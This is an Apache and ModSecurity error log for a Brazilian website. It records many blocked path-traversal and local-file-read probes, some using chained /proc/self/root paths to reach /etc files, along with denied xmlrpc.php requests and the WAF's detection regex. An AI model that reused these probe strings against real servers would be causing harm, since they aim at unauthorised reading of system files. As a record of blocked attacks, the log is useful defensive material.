[Fri Mar 20 10:25:44.601193 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:38430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1K2PqxLDW4GITHUkQIVwAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:25:48.435012 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.23:57994] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1K2xCii7xarUs8iHaIGwAAAgM"]
[Fri Mar 20 10:26:03.251349 2026] [:error] [pid 31215:tid 140411725141760] [client 57.141.18.114:58532] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1K6wF0L0L-SsrnPo6HYQAAAsI"]
[Fri Mar 20 10:26:03.476365 2026] [:error] [pid 31215:tid 140411716749056] [client 57.141.18.14:58728] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1K6wF0L0L-SsrnPo6HYgAAAsM"]
[Fri Mar 20 10:26:18.842990 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.94:59260] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1K-hCii7xarUs8iHaIVgAAAgw"]
[Fri Mar 20 10:26:24.295688 2026] [:error] [pid 15826:tid 140411649607424] [client 57.141.18.15:59440] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LAOoXxyEfFpUF8f-e9QAAAUs"]
[Fri Mar 20 10:26:28.176764 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.243.128:36550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1LBAF0L0L-SsrnPo6HewAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 10:26:31.639697 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:41332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1LB9a6ubjKNq_cu4b4GgAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:26:38.465830 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:41336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1LDta6ubjKNq_cu4b4IgAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 10:26:39.419796 2026] [:error] [pid 7893:tid 140411616036608] [client 57.141.18.5:59926] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LDxCii7xarUs8iHaIcQAAAg8"]
[Fri Mar 20 10:26:40.527481 2026] [:error] [pid 26799:tid 140411574073088] [client 57.141.18.29:60002] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LENa6ubjKNq_cu4b4IwAAA1Q"]
[Fri Mar 20 10:26:43.963498 2026] [:error] [pid 9818:tid 140411616036608] [client 57.141.18.64:60166] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LE11pVZ5mVmJwsFNOXAAAAE8"]
[Fri Mar 20 10:26:48.799037 2026] [:error] [pid 26799:tid 140411582465792] [client 57.141.18.23:60482] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LGNa6ubjKNq_cu4b4KQAAA1M"]
[Fri Mar 20 10:26:51.387928 2026] [access_compat:error] [pid 7235:tid 140411582465792] [client 195.123.216.134:40344] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:26:55.149165 2026] [access_compat:error] [pid 7235:tid 140411565680384] [client 192.42.116.51:54769] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:26:56.443493 2026] [access_compat:error] [pid 15826:tid 140411632822016] [client 192.159.99.21:47046] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:26:58.081132 2026] [access_compat:error] [pid 7235:tid 140411725141760] [client 194.26.192.177:58440] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:26:59.246260 2026] [access_compat:error] [pid 11642:tid 140411632822016] [client 51.210.110.89:39785] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:27:03.167507 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.3:60992] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1LJ9a6ubjKNq_cu4b4PgAAA0o"]
[Fri Mar 20 10:27:04.384518 2026] [access_compat:error] [pid 11642:tid 140411565680384] [client 51.210.104.244:38889] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:27:05.554616 2026] [access_compat:error] [pid 15826:tid 140411565680384] [client 51.210.108.113:36163] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:27:21.591112 2026] [access_compat:error] [pid 7893:tid 140411582465792] [client 185.243.218.230:33428] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:27:25.779963 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:41480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1LPTJ3M9BSuKP7CAZBPgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:27:26.944087 2026] [:error] [pid 26799:tid 140411582465792] [client 57.141.18.33:33794] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LPta6ubjKNq_cu4b4WgAAA1M"]
[Fri Mar 20 10:27:31.889283 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:40270] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1LQ9a6ubjKNq_cu4b4ZgAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:27:38.691456 2026] [:error] [pid 21219:tid 140411666392832] [client 57.141.18.43:34262] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LSvXLqtnMIWvjpaK5PAAAAok"]
[Fri Mar 20 10:27:39.023100 2026] [:error] [pid 21219:tid 140411691570944] [client 57.141.18.44:34278] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LS_XLqtnMIWvjpaK5PwAAAoY"]
[Fri Mar 20 10:27:39.165498 2026] [:error] [pid 15826:tid 140411666392832] [client 57.141.18.37:34280] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LS-oXxyEfFpUF8f-fLgAAAUk"]
[Fri Mar 20 10:27:39.551448 2026] [:error] [pid 9818:tid 140411691570944] [client 57.141.18.23:34302] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LS11pVZ5mVmJwsFNOfgAAAEY"]
[Fri Mar 20 10:27:56.244168 2026] [:error] [pid 7235:tid 140411666392832] [client 57.141.18.38:34940] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1LXPqxLDW4GITHUkQIqwAAAQk"]
[Fri Mar 20 10:27:56.427727 2026] [:error] [pid 21219:tid 140411741927168] [client 57.141.18.108:34950] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1LXPXLqtnMIWvjpaK5WwAAAoA"]
[Fri Mar 20 10:27:58.081874 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.77:34848] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1LXOoXxyEfFpUF8f-fPQAAAUE"]
[Fri Mar 20 10:28:02.537771 2026] [mime_magic:error] [pid 21219:tid 140411624429312] (70014)End of file found: [client 74.7.241.31:35778] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/sbin
